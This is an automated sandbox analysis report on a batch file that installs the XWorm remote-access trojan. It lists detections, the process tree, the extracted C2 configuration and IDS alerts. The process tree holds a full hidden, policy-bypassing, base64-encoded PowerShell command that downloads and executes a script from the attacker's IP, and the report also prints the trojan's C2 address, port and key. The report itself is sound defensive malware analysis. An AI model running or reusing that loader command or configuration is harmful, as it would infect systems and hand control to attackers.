Windows Analysis Report: 92.255.85.2.bat
Overview
General Information
Detection: XWorm
Score: 100 (Range: 0 - 100)
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7872 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
- csc.exe (PID: 2168 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 5860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- MSBuild.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- cleanup
Name | Description | Attribution
---|---|---
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution
{
"C2 url": [
"92.255.85.2"
],
"Port": 4372,
"Aes key": "P0WER",
"SPL": "<Xwormmm>",
"Install file": "USB.exe",
"Version": "XWorm V5.66"
}
Rule | Description | Author
---|---|---
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
Rule | Description | Author
---|---|---
JoeSecurity_XWorm | Yara detected XWorm | Joe Security
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
Rule | Description | Author
---|---|---
JoeSecurity_XWorm | Yara detected XWorm | Joe Security
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
System Summary (Sigma rule authors)
- Florian Roth (Nextron Systems)
- Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
- Florian Roth (Nextron Systems)
- frack113
- Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
- frack113
- frack113
- Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data Obfuscation (Sigma rule authors)
- Joe Security
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:32.921009+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:31.629098+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:32.921009+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:31.629098+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:32.921009+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:31.433972+0100 | 2860704 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:43.466077+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:16:49.514320+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:01.479932+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:13.451658+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:13.650572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:25.425533+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:37.392026+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:43.466619+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:44.856662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.030635+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.227154+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.421592+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:54.840066+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:55.283537+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:07.090159+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:10.733214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:10.936247+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:13.464004+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:16.467874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:26.591249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:35.591181+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:36.715860+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:36.913478+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:42.968290+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:43.465214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:54.953471+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:57.312199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:02.653237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:07.043940+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:13.467848+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:16.762696+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:18.887479+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:19.083128+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:24.279149+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:26.247568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:34.544073+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:34.743055+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:37.888014+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:39.795628+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:40.235872+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:43.464364+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:45.185013+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:45.381022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:50.684969+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:50.881516+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:02.715303+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:13.465253+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:13.967983+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:15.060706+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:19.015072+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:25.631596+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:27.590423+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:31.899017+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:16:49.517689+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:01.482824+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:13.453838+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:25.428914+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:37.393662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:44.861673+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.227234+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.421926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.666373+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:54.844212+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:55.285057+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:07.092219+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:10.937363+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:11.179489+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:16.469414+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:26.594039+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:35.596080+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:36.913554+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:37.164279+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:42.969926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:54.956480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:57.317866+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:02.678853+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:07.045934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:16.764512+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:19.083288+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:19.318764+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:24.281096+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:26.249496+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:34.743146+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:34.937960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:37.889843+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:39.800308+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:40.237882+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:45.381284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:45.617888+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:50.881600+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:51.136493+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:02.717007+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:13.972424+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:15.062352+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:19.016686+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:25.634097+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:27.592172+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:31.900002+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:16:43.466077+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:35.395014+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
AV Detection (sources)
- Avira URL Cloud
- Avira
- Malware Configuration Extractor
- Virustotal
- ReversingLabs
- String decryptor
- Binary string
Networking (sources)
- Suricata IDS
- URLs
- TCP traffic
- HTTP traffic detected